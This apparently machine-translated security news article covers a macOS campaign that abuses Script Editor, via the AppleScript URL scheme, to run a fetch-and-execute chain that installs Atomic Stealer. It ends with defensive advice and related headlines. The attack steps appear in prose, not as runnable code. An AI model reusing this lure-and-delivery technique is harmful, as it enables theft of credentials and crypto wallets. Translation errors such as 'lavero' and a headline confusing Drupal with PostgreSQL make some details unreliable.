A new campaign for macOS users has once again focused on a social engineering technique that exploits a system confidence application: the Editor Script. Security researchers have observed that attackers are using web pages with legitimate appearance - usually guides to release disk space or improve Mac performance - to induce the browser to open special links that release Script Editor with code already inserted. The result: the user sees a window of an apparently harmless native app, but behind it is the execution of commands that download and release malware without going through an explicit Terminal.
Script Editor is a pre-installed tool in macOS designed to create and run AppleScript and JXA and therefore enjoys the privileges and confidence of the system. That confidence is precisely what attackers take advantage of: instead of asking the user to copy and paste lines in Terminal - the classic tactic known as ClickFix - now the AppleScript URL scheme is used to open Editor Script with a malicious script already loaded. When you accept the opening, the code can run an oval chain "curl-124; zsh" that downloads and runs scripts directly in memory, decouples compressed payloads, writes temporary binaries, eliminates security attributes with xattr and starts the final executable.
In this particular campaign the researchers of Jamf They identified as final payload a Mach-O binary known as Atomic Stealer (also referred to as AMOS), a malware of-the-shell that has repeatedly appeared in ClickFix-type campaigns over the past year. Atomic Stealer is designed to extract sensitive information from the system: data stored in the lavero (Keychain), desktop content, cryptomoneda purse extensions in the browser, self-completed, passwords, cookies, saved cards and other system information. Recent reports also indicate that operators have added back door components to maintain persistent access to committed equipment.
The subtlety of the current variation is that the user does not necessarily have to interact with Terminal to make the attack work: Script Editor, by its very nature, can serve as an execution vector when supplied with code from a URL. So some measures added by Apple in recent versions of macOS seek to stop these delusions by showing warnings when trying to run commands from Terminal or related applications; although these protections help, they do not completely eliminate the risk if the victim grants permission or confirms the opening of a script by relying on the content of the page.
If you receive an online system maintenance guide that invites you to "run a command" or open a script, treat her with suspicion. Malicious pages often mimic the aesthetics and language of legitimate help resources to lower the guard: Apple iconography, screenshots and apparently reasonable steps. The general recommendation is to go only to official documentation for system problems; the Apple support site on Script Editor can help you understand the real purpose of that tool: support.apple.com - Script Editor. For user-to-user consultations and solutions, the official Apple community also exists, although it should be recalled that forums are not risk-free: Apple Support Communities.
In corporate and management environments, using endpoints management and protection solutions reduces the likelihood of infection and facilitates the detection of abnormal behaviors; for domestic users, keeping the system up-to-date and distrusting "fast tricks" to recover space or speed up equipment is the most effective defense. In addition, if you suspect that your team has been compromised, you should disconnect it from networks, review processes with Activity Monitor, and request the support of professionals or security tools for forensic analysis and cleaning.
The reuse of legitimate applications by attackers is not a novelty, but a reminder that the attack surface changes with the creativity of cybercriminals. Treat Script Editor notices as potentially dangerous and verify the origin of any technical instruction It is, for now, the most practical solution not to fall into these traps.
To expand information on how Apple and the security community are responding to these ClickFix variants and campaigns with info-stealers, recent research and news reports can be consulted; a coverage that synthesizes Apple's introduction of warnings can be read in BleepingComputer, and the technical analysis of the campaign with Atomic Stealer was published by Jamf.
Safety alert Drug critical vulnerability of SQL injection in PostgreSQL requires immediate update
Drucal has published safety updates for a vulnerability qualified as "highly critical" which affects Drumal Core and allows an attacker to achieve arbitrary SQL injection in sit...
18-year-old Ukrainian youth leads a network of infostealers that violated 28,000 accounts and left $250,000 in losses
The Ukrainian authorities, in coordination with US agents. They have focused on an operation of infostealer which, according to the Ukrainian Cyber Police, was allegedly adminis...
RAMPART and Clarity redefine the safety of IA agents with reproducible testing and governance from the start
Microsoft has presented two open source tools, RAMPART and Clarity, aimed at changing the way the safety of IA agents is tested: one that automates and standardizes technical te...
The digital signature is in check: Microsoft dismands a service that turned malware into apparently legitimate software
Microsoft announced the disarticulation of a "malware-signing-as-a-service" operation that exploited its device signature system to convert malicious code into seemingly legitim...
A single GitHub workflow token opened the door to the software supply chain
A single GitHub workflow token failed in the rotation and opened the door. This is the central conclusion of the incident in Grafana Labs following the recent wave of malicious ...
WebWorm 2025: the malware that is hidden in Discord and Microsoft Graphh to evade detection
The latest observations by cyber security researchers point to a change in worrying tactics of an actor linked to China known as WebWorm: in 2025 it has incorporated back doors ...
Identity is no longer enough: continuous verification of the device for real-time security
Identity remains the backbone of many security architectures, but today that column is cracking under new pressures: advanced phishing, real-time proxyan authentication kits and...